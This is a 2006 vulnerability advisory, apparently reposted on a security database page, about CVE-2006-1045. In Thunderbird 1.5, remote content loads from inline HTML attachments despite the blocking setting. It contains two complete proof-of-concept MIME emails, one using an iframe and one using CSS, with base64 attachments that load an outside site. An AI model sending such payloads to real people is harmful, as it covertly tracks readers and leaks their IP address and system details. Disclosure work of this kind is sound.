Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities

2006.03.01
Credit: Renaud Lifchitz
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2006-1045
CWE: CWE-Other


CVSS Base Score: 2.6/10
Impact Subscore: 2.9/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities //----- Advisory Program : Mozilla Thunderbird Homepage : http://www.mozilla.com/thunderbird/ Tested version : 1.5 Found by : crashfr at sysdream dot com This advisory : crashfr at sysdream dot com Discovery date : 2006/02/18 //----- Application description Full-Featured Email Simple to use, powerful, and customizable, Thunderbird is a full-featured email application. Thunderbird supports IMAP and POP mail protocols, as well as HTML mail formatting. Easily import your existing email accounts and messages. Built-in RSS capabilities, powerful quick search, spell check as you type, global inbox, deleting attachments and advanced message filtering round out Thunderbird's modern feature set. //----- Description of vulnerability Thunderbird's HTML rendering engine insufficiently filters the loading of external resources from inline HTML attachments. External files are downloaded even if the "Block loading of remote images in mail messages" option is enabled. //----- Proof Of Concept * Iframe Exploit : Subject: Thunploit by CrashFr ! From: CrashFr<crashfr (at) chez (dot) com [email concealed]> To: CrashFr<crashfr (at) chez (dot) com [email concealed]> Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0000_DE61E470.78F38016" This is a multi-part message in MIME format. ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0001_06199DF9.5C825A99" ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Test by CrashFr ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 7bit <html><head> </head><body style="margin: 0px; padding: 0px; border: 0px;"> <iframe src="cid:257481cab71f$562e86af (at) sysdream (dot) com [email concealed]" width="100%" height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe> </body></html> ------=_NextPart_001_0001_06199DF9.5C825A99-- ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: text/html; name="basic.html" Content-Transfer-Encoding: base64 Content-ID: <257481cab71f$562e86af (at) sysdream (dot) com [email concealed]> PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzog MHB4 OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIg d2lk dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0i MCIg bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg== ------=_NextPart_000_0000_DE61E470.78F38016-- * CSS Exploit : Subject: Thunploit by CrashFr ! From: CrashFr<crashfr (at) chez (dot) com [email concealed]> To: CrashFr<crashfr (at) chez (dot) com [email concealed]> Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0000_DE61E470.78F38016" This is a multi-part message in MIME format. ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0001_06199DF9.5C825A99" ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Test by CrashFr ------=_NextPart_001_0001_06199DF9.5C825A99 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: 7bit <html><head> <link rel="stylesheet" type="text/css" href="cid:257481cab71f$562e86af (at) sysdream (dot) com [email concealed]" /></head><body> </body></html> ------=_NextPart_001_0001_06199DF9.5C825A99-- ------=_NextPart_000_0000_DE61E470.78F38016 Content-Type: text/css; name="basic.css" Content-Transfer-Encoding: base64 Content-ID: <257481cab71f$562e86af (at) sysdream (dot) com [email concealed]> QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsg YmFj a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ== ------=_NextPart_000_0000_DE61E470.78F38016-- //----- Impact Successful exploitation may lead to information disclosure (user agent: application version & platform, IP address...). A spammer can easily check if an email is read. Moreover, an HTML reply to those types of emails will contain the complete url path to the mailbox (ie: mailbox:///C%7C/Documents%20and%20Settings/CrashFr/ Application%20Data/Thunderbird/Profiles/7jko3in9.default/ Mail/Local%20Folders/Inbox?number=2194930&header=quotebody&part= 1.2&filename=basic.css"). //----- Solution No known solution. You have to wait for a vendor upgrade. //----- Credits http://www.sysdream.com crashfr at sysdream dot com //----- Greetings nono2357 & the hackademy ...


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top